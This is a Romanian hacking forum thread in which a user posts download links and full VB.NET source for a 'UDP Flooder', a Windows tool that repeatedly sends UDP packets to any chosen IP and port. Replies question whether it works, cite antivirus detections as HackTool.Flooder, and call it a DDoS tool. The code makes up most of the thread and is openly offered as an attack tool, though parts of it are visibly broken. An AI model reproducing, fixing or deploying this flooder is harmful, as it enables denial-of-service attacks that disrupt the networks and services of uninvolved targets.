bc-vnt Posted August 11, 2012 Report Share Posted August 11, 2012 (edited) Download : UDP Flooder.exe download - 2sharedDownload2 : Zippyshare.com - UDP Flooder.exeImports System.Net, System.Net.Sockets, System.ComponentModelImports System.Windows.Forms.VisualStyles.VisualStyleElementPublic Class Form1 Public Enum Staus Attaking = 1 Stopped = 2 End Enum Friend WithEvents bgFlood As New BackgroundWorker Dim IsFlooding As Boolean = False Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load bgFlood.WorkerReportsProgress = True End Sub Private Sub Flood(ByVal sende As Object, ByVal e As DoWorkEventArgs) Handles bgFlood.DoWork Dim IP As IPAddress = IPAddress.Parse(Host.Text) Dim IPandPort As New IPEndPoint(IP, Convert.ToInt32(Port.Text)) Dim Packet As Byte() = New Byte(PacketSize.Text) {} Dim SockNum As Integer = Sockets.Text Do While IsFlooding = True For i = 0 To SockNum If IsFlooding = True Then Dim _Sock(i) As Socket _Sock(i) = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp) Try _Sock(i).SendTo(Packet, IPandPort) bgFlood.ReportProgress(Status) Threading.Thread.Sleep(500) Catch ex As Exception Threading.Thread.Sleep(500) End Try Else Exit Do End If Next Loop bgFlood.ReportProgress(Status) End Sub Private Sub Report(ByVal sender As Object, ByVal e As ProgressChangedEventArgs) Handles bgFlood.ProgressChanged Select Case e.ProgressPercentage Case Status() ListBox1.Items.Add("Flooding..." & Date.Now.ToLocalTime) ListBox1.SelectedIndex = ListBox1.Items.Count - 1 Case Status() ListBox1.Items.Add("Stopped... -" & Date.Now.ToLocalTime) ListBox1.SelectedIndex = ListBox1.Items.Count - 1 End Select End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click IsFlooding = True If Not bgFlood.IsBusy = False Then bgFlood.RunWorkerAsync() End If End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click IsFlooding = False End Sub Private Function Status() As Integer Throw New NotImplementedException End FunctionEnd Class Edited August 11, 2012 by bc-vnt Quote Link to comment Share on other sites More sharing options...
JokerulX Posted August 12, 2012 Report Share Posted August 12, 2012 l-a testat careva?works? Quote Link to comment Share on other sites More sharing options...
banks Posted August 12, 2012 Report Share Posted August 12, 2012 l-a testat careva?works?Nu Quote Link to comment Share on other sites More sharing options...
chioara3 Posted August 12, 2012 Report Share Posted August 12, 2012 Virus Total : https://www.virustotal.com/file/554ac57e29dfbb4a53d38266812397a3bb71b01273064a7397839c856a09eb46/analysis/1344761234/ Quote Link to comment Share on other sites More sharing options...
Guest Kovalski Posted August 12, 2012 Report Share Posted August 12, 2012 ^ pai e pentru ddos ce te astepti sa iti arate la scan?a variant of MSIL/HackTool.FlooderHEUR:HackTool.MSIL.Flooder.gen Quote Link to comment Share on other sites More sharing options...
chioara3 Posted August 12, 2012 Report Share Posted August 12, 2012 `^ pai e pentru ddos ce te astepti sa iti arate la scan?a variant of MSIL/HackTool.FlooderHEUR:HackTool.MSIL.Flooder.genPoate DOS. Quote Link to comment Share on other sites More sharing options...
LegioNRST Posted August 13, 2012 Report Share Posted August 13, 2012 L-am 'f?cut' eu de curiozitate ?i nu prea face treab? Quote Link to comment Share on other sites More sharing options...
caddyptm Posted August 15, 2012 Report Share Posted August 15, 2012 foarte bun,multumesc umploader Quote Link to comment Share on other sites More sharing options...